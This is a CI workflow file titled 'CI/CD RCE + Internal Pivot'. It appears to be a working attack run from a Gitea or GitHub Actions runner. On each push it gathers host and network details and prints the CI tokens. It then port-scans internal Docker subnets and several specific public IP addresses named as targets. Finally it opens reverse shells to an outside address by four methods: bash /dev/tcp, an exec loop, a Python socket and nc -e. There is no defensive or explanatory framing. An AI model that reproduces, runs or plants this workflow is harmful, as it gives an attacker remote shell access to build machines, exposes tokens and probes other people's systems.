name: CI/CD RCE + Internal Pivot on: [push, workflow_dispatch] jobs: rce-host: runs-on: linux-amd64 steps: - name: Checkout uses: actions/checkout@v4 - name: Host Recon run: | echo "=== HOST INFO ===" echo "Timestamp: $(date -u)" echo "Hostname: $(hostname)" echo "User: $(whoami)" echo "PWD: $(pwd)" echo "Kernel: $(uname -a)" echo "UID: $(id)" echo "=== NETWORK INFO ===" ip addr show 2>/dev/null || ifconfig 2>/dev/null || true ip route show 2>/dev/null || route -n 2>/dev/null || true ip neigh show 2>/dev/null || arp -a 2>/dev/null || true cat /etc/resolv.conf 2>/dev/null || true cat /etc/hosts 2>/dev/null || true echo "=== DOCKER PRESENCE ===" docker ps -a 2>/dev/null || echo "No docker" docker network ls 2>/dev/null || echo "No docker networks" docker info 2>/dev/null | head -10 || echo "No docker info" echo "=== PROCESS LIST ===" ps aux 2>/dev/null | head -30 || true echo "=== MOUNT POINTS ===" mount 2>/dev/null | head -20 || true df -h 2>/dev/null | head -20 || true echo "=== ENV VARS ===" env | sort | grep -v -i token | grep -v -i secret | grep -v -i key | grep -v -i pass || true echo "=== GITEA ACTIONS VARS ===" echo "GITEA_TOKEN: ${GITEA_TOKEN:-NOT_SET}" echo "GITHUB_TOKEN: ${GITHUB_TOKEN:-NOT_SET}" echo "GITEA_SERVER_URL: ${GITEA_SERVER_URL:-NOT_SET}" echo "GITEA_REPOSITORY: ${GITEA_REPOSITORY:-NOT_SET}" - name: Internal Network Scan run: | echo "=== SCANNING DOCKER NETWORKS ===" for net in 172.17.0 172.18.0 172.19.0 172.20.0 172.21.0 172.22.0 10.0.0 10.10.0 192.168.0 192.168.1; do for host in 1 2 3 4 5 10 100 200; do ip="${net}.${host}" for port in 22 80 3000 3306 5432 6379 2375 2376 8080 8088 8418 9090; do timeout 1 bash -c "echo >/dev/tcp/$ip/$port" 2>/dev/null && echo "DOCKER_SCAN: $ip:$port OPEN" & done wait 2>/dev/null || true done done echo "=== SCAN COMPLETE ===" - name: PostgreSQL Target Scan run: | echo "=== TARGETING 156.239.230.24 ===" for port in 22 80 222 443 3000 3001 3306 5432 6379 8088 41327; do timeout 2 bash -c "echo >/dev/tcp/156.239.230.24/$port" 2>/dev/null && echo "PG_TARGET: 156.239.230.24:$port OPEN" || echo "PG_TARGET: 156.239.230.24:$port closed" done echo "=== TARGETING GITEA INSTANCES ===" for host in 156.239.229.173 156.239.227.133 47.79.84.115 38.47.240.117 38.47.98.14 156.239.2.237; do for port in 22 80 222 443 3000 3306 5432 6379 8080 8088 8418; do timeout 2 bash -c "echo >/dev/tcp/$host/$port" 2>/dev/null && echo "GITEA_NET: $host:$port OPEN" & done done wait 2>/dev/null || true echo "=== TARGET SCAN COMPLETE ===" - name: Reverse Shell (Multiple Methods) run: | RHOST="202.59.10.226" # Method 1: Bash direct (bash -c "bash -i >& /dev/tcp/${RHOST}/4444 0>&1" &) 2>/dev/null # Method 2: Bash with exec (bash -c "exec 5<>/dev/tcp/${RHOST}/4445; cat <&5 | while read line; do \$line 2>&5 >&5; done" &) 2>/dev/null # Method 3: Python python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('${RHOST}',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])" & # Method 4: nc which nc 2>/dev/null && (nc ${RHOST} 4444 -e /bin/bash &) || true echo "Reverse shells dispatched to ${RHOST}:4444,4445" - name: Write Recon Output run: | mkdir -p /tmp/recon_output ip addr show > /tmp/recon_output/network.txt 2>&1 || true ip route show >> /tmp/recon_output/network.txt 2>&1 || true mount >> /tmp/recon_output/network.txt 2>&1 || true echo "Recon saved to /tmp/recon_output/" cat /tmp/recon_output/network.txt